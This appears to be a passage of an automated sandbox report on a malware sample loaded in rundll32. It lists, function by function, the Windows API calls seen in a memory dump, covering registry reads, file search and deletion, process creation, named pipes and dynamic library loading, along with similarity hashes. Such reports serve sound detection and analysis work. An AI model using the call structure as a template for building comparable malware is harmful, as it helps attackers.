                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04F62CA9
                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04F62CC7
                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 04F62CF3
                            • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 04F62D62
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62DDA
                            • wsprintfA.USER32 ref: 04F62DF6
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62E01
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62E18
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62EA4
                            • wsprintfA.USER32 ref: 04F62EBF
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62ECA
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62EE1
                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 04F62F03
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62F1E
                            • wsprintfA.USER32 ref: 04F62F35
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62F40
                              • Part of subcall function 04F63172: lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                              • Part of subcall function 04F63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                              • Part of subcall function 04F63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                              • Part of subcall function 04F63172: GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                              • Part of subcall function 04F63172: HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62F57
                            • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06318A20), ref: 04F62F83
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                            • String ID:
                            • API String ID: 3130754786-0
                            • Opcode ID: cbc87164fd9cf0c63b4c94905609d6eb942e355241c4ab9bd94d0946cc79d09b
                            • Instruction ID: ddc196f110b9c6d390e3c47c8d1735378ab8e96a77e9c4827bde0fbfd36ef993
                            • Opcode Fuzzy Hash: cbc87164fd9cf0c63b4c94905609d6eb942e355241c4ab9bd94d0946cc79d09b
                            • Instruction Fuzzy Hash: 58A14AB1D00119FFDB11AF94EC84DBEBBB9FB08304B01446AF916AB250D7396D46EB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?), ref: 04F711AA
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                              • Part of subcall function 04F7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                              • Part of subcall function 04F7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BCB9
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04F71206
                            • memcpy.NTDLL(00000000,?,00000000), ref: 04F71219
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F71230
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BD65
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BD77
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BD92
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04F7125B
                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04F71273
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F712CD
                            • lstrlenW.KERNEL32(00000000,?), ref: 04F712F0
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F71302
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04F71376
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71386
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04F713AF
                            • lstrlenW.KERNEL32(04F8B878,?), ref: 04F71429
                            • DeleteFileW.KERNEL32(?,?), ref: 04F71457
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71465
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71486
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                            • String ID:
                            • API String ID: 72361108-0
                            • Opcode ID: 6b787fbbaf806654016881fea0394eb65344e22a1acf91662b5966303b6a9f9f
                            • Instruction ID: 049a63d580eb461e7f2169c0a6b2dfcdc403f43dac7cb7c41d020f16f761000b
                            • Opcode Fuzzy Hash: 6b787fbbaf806654016881fea0394eb65344e22a1acf91662b5966303b6a9f9f
                            • Instruction Fuzzy Hash: 2991F0B194021EFFDB11DFA4EC88CBA7BBCFB09354B04445AF605DB211D638A94ADB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F77F9B
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F77FB8
                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F78008
                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04F78012
                            • GetLastError.KERNEL32 ref: 04F7801C
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7802D
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04F7804F
                            • HeapFree.KERNEL32(00000000,?), ref: 04F78086
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F7809A
                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04F780A3
                            • SuspendThread.KERNEL32(?), ref: 04F780B2
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000), ref: 04F780C6
                            • SetEvent.KERNEL32(00000000), ref: 04F780D3
                            • CloseHandle.KERNEL32(00000000), ref: 04F780DA
                            • Sleep.KERNEL32(000001F4), ref: 04F780ED
                            • ResumeThread.KERNEL32(?), ref: 04F78111
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                            • String ID:
                            • API String ID: 1011176505-0
                            • Opcode ID: 727100b377aabf233769816e475ffe0f7591104ff2eceecfcffd28b44586dcd0
                            • Instruction ID: 88e6e997d163dd249b86160929d07ea3970794a7a8cac5d8ee8b8ae03fa3273a
                            • Opcode Fuzzy Hash: 727100b377aabf233769816e475ffe0f7591104ff2eceecfcffd28b44586dcd0
                            • Instruction Fuzzy Hash: F6410972D0014EFFDB10AFA4FC889BE7BB9FB04344B14546EE601AA110D73D6D969BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F65465
                            • StrChrA.SHLWAPI(?,0000000D), ref: 04F654AB
                            • StrChrA.SHLWAPI(?,0000000A), ref: 04F654B8
                            • StrChrA.SHLWAPI(?,0000007C), ref: 04F654DF
                            • StrTrimA.SHLWAPI(?,04F85FCC), ref: 04F654F4
                            • StrChrA.SHLWAPI(?,0000003D), ref: 04F654FD
                            • StrTrimA.SHLWAPI(00000001,04F85FCC), ref: 04F65513
                            • _strupr.NTDLL ref: 04F6551A
                            • StrTrimA.SHLWAPI(?,?), ref: 04F65527
                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04F6556F
                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 04F6558E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                            • String ID: $;
                            • API String ID: 4019332941-73438061
                            • Opcode ID: 90285d6f6ea59c5f4560e05dc763ed1123bd4923911c5fb2e3ac33236c8a37b8
                            • Instruction ID: fb73582d910b169e3468cfc25fab5fbc9ce55538b853e5efd6e1f401219034bf
                            • Opcode Fuzzy Hash: 90285d6f6ea59c5f4560e05dc763ed1123bd4923911c5fb2e3ac33236c8a37b8
                            • Instruction Fuzzy Hash: 7E41D8B1904306AFD711EF28EC48B2BBBEAEF55304F04181DF4969B241DB74F9068B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • wsprintfA.USER32 ref: 04F72DF8
                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 04F72E0C
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 04F72F37
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F72E38
                            • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F72E70
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                            • String ID: 0x%08X$W
                            • API String ID: 95801598-2600449260
                            • Opcode ID: 1558ea98b5208349ad3b8be187c7969e93a78986c9dd3c2f1ae3654b3e81ac5e
                            • Instruction ID: bc45c27f429e6b75a7cbb991dcf1c3edafc3e965d1c26eacc997ee434012a8ce
                            • Opcode Fuzzy Hash: 1558ea98b5208349ad3b8be187c7969e93a78986c9dd3c2f1ae3654b3e81ac5e
                            • Instruction Fuzzy Hash: 04517FB1A00209BFDB109F64DC45BAE7BE8FF08714F10851AF959DB280D7B8E645CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                            • wcstombs.NTDLL ref: 04F7C077
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                            • TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                            • GetLastError.KERNEL32 ref: 04F7C102
                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 04F7C122
                            • CloseHandle.KERNEL32(?), ref: 04F7C131
                            • CloseHandle.KERNEL32(?), ref: 04F7C136
                            • GetLastError.KERNEL32 ref: 04F7C13A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                            • String ID: D
                            • API String ID: 2463014471-2746444292
                            • Opcode ID: b967405ca727ef843ddefa5e0555c331a43798923914a6634181636501acfc18
                            • Instruction ID: 856d60f6177627707ce0c35f26c2eab4e0e165509920dbf55d374cd6a00301d0
                            • Opcode Fuzzy Hash: b967405ca727ef843ddefa5e0555c331a43798923914a6634181636501acfc18
                            • Instruction Fuzzy Hash: 13411D72D0015CBFEB11DFA4DD859EEBBB8EB08344F20406AE601B6100E6796E459B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04F64526
                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04F64545
                            • GetLastError.KERNEL32 ref: 04F646F6
                            • GetLastError.KERNEL32 ref: 04F64778
                            • SwitchToThread.KERNEL32(?,?,?,?), ref: 04F647C1
                            • GetLastError.KERNEL32 ref: 04F64813
                            • GetLastError.KERNEL32 ref: 04F64822
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F64832
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F64843
                            • RtlExitUserThread.NTDLL(?), ref: 04F64851
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F648C0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F64911
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 04F64946
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 04F64956
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                            • String ID:
                            • API String ID: 2794784202-0
                            • Opcode ID: 5aa2622f0e983bfcf589f5aaeacac1b874732dd1b10eb325922aec58206b5a25
                            • Instruction ID: d6b862d17983007ad62e8f2b6125198ba42a1d35ca9d6a9d8981c2a3336373ed
                            • Opcode Fuzzy Hash: 5aa2622f0e983bfcf589f5aaeacac1b874732dd1b10eb325922aec58206b5a25
                            • Instruction Fuzzy Hash: 58E15BB1900249AFEB20AF60DC88EBA7BB9FF08304F104529F91AD7151E775AD56CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C03F
                            • StrTrimA.SHLWAPI(00000001,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 04F6C058
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C063
                            • StrTrimA.SHLWAPI(00000001,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 04F6C07C
                            • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 04F6C11F
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F6C141
                            • lstrcpy.KERNEL32(00000020,?), ref: 04F6C160
                            • lstrlen.KERNEL32(?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 04F6C16A
                            • memcpy.NTDLL(?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C1AB
                            • memcpy.NTDLL(?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 04F6C1BE
                            • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057), ref: 04F6C1E2
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E), ref: 04F6C201
                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?), ref: 04F6C227
                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?), ref: 04F6C243
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                            • String ID:
                            • API String ID: 3323474148-0
                            • Opcode ID: 442335ce0e9e6183b84385b77ddfc79278b7406d6c342a82243da0e89ab49798
                            • Instruction ID: 8f861e62862408589e148ab9d5846fb26549374c9086bbbd595018a4e721e294
                            • Opcode Fuzzy Hash: 442335ce0e9e6183b84385b77ddfc79278b7406d6c342a82243da0e89ab49798
                            • Instruction Fuzzy Hash: 6B716B72904345AFD721DF24DC44A6ABBE8FF48304F04492EFADAD7250D734E9468B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,?,00000000), ref: 04F705D3
                            • lstrlen.KERNEL32(?,?,00000000), ref: 04F705DA
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F705F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F70602
                            • lstrcat.KERNEL32(?,?), ref: 04F7061E
                            • lstrcat.KERNEL32(?,?), ref: 04F7062F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F70640
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F706DD
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 04F70716
                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 04F7072F
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04F70739
                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04F70749
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F70762
                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04F70772
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                            • String ID:
                            • API String ID: 333890978-0
                            • Opcode ID: 2720c3cbc98542974e584170ce4d81bfa08b5f20c8b8fc6e3df95ff953921281
                            • Instruction ID: a0c4c228e4f38d75b2b5394aaaa80c7a65562daa3a74def3f1d5371793777a51
                            • Opcode Fuzzy Hash: 2720c3cbc98542974e584170ce4d81bfa08b5f20c8b8fc6e3df95ff953921281
                            • Instruction Fuzzy Hash: FB517C7680014DBFDB019FA4EC84CBE7BBDEF48344B15846AFA15AB110D639AE46DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,00000000,?,?,?,04F6663D,?,?), ref: 04F7AFCF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04F6663D,?,?), ref: 04F7AFF8
                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04F7B018
                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04F7B034
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B040
                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,04F6663D,?,?), ref: 04F7B043
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B04F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B06C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B086
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B09C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0B2
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0C8
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0DE
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,04F6663D,?,?), ref: 04F7B107
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                            • String ID:
                            • API String ID: 3772355505-0
                            • Opcode ID: dfb1fb3fd8ae0cb1f0a040b8567d8e17e15be1af13d231dde1f4bc06bd736748
                            • Instruction ID: d7ccad946a2d54521162e9961085ad0814a5a9ced44ab4305b9a3ad70cc29ab3
                            • Opcode Fuzzy Hash: dfb1fb3fd8ae0cb1f0a040b8567d8e17e15be1af13d231dde1f4bc06bd736748
                            • Instruction Fuzzy Hash: A83108B1A0461BBFD711DF64EC84D667BECEF05358B04846AF905CB251EB78E8058BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D02D
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D038
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D040
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6D055
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6D066
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F6D078
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D07D
                            • lstrcatW.KERNEL32(00000000,04F853E0), ref: 04F6D089
                            • lstrcatW.KERNEL32(00000000), ref: 04F6D092
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D097
                            • lstrcatW.KERNEL32(00000000,04F853E0), ref: 04F6D0A3
                            • lstrcatW.KERNEL32(00000000,00000002), ref: 04F6D0BF
                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D0C7
                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D0D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                            • String ID:
                            • API String ID: 3635185113-0
                            • Opcode ID: 34bc933e104d653131cbcf64a25acd044a0525d7de1d8624555aa173f4a09936
                            • Instruction ID: fca63d46680c4cf6f9f453d49a1c9e9d3660ddff2e4235e4f36e8b07c5caf0df
                            • Opcode Fuzzy Hash: 34bc933e104d653131cbcf64a25acd044a0525d7de1d8624555aa173f4a09936
                            • Instruction Fuzzy Hash: 0921A13260021ABFD3216F64EC84E7FBBB8EF85B45F11051EF5069A110CB68AC069AA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F67A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04F67AA6
                              • Part of subcall function 04F67A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04F67ABE
                              • Part of subcall function 04F67A61: WaitForSingleObject.KERNEL32(00000000,?,04F787CC,?,?), ref: 04F67B86
                              • Part of subcall function 04F67A61: HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BAF
                              • Part of subcall function 04F67A61: HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BBF
                              • Part of subcall function 04F67A61: RegCloseKey.ADVAPI32(?,?,04F787CC,?,?), ref: 04F67BC8
                            • lstrcmp.KERNEL32(?,00000000), ref: 04F7E211
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04F6399C,00000000,00000000), ref: 04F7E23D
                            • GetCurrentThreadId.KERNEL32 ref: 04F7E2EE
                            • GetCurrentThread.KERNEL32 ref: 04F7E2FF
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,04F6399C,00000001,7620F730,00000000,00000000), ref: 04F7E33C
                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,04F6399C,00000001,7620F730,00000000,00000000), ref: 04F7E350
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F7E35E
                            • wsprintfA.USER32 ref: 04F7E376
                              • Part of subcall function 04F63263: lstrlen.KERNEL32(?,00000000,04F83716,00000000,04F72466,?,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?), ref: 04F6326D
                              • Part of subcall function 04F63263: lstrcpy.KERNEL32(00000000,?), ref: 04F63291
                              • Part of subcall function 04F63263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F63298
                              • Part of subcall function 04F63263: lstrcat.KERNEL32(00000000,?), ref: 04F632EF
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F7E381
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F7E398
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7E3A9
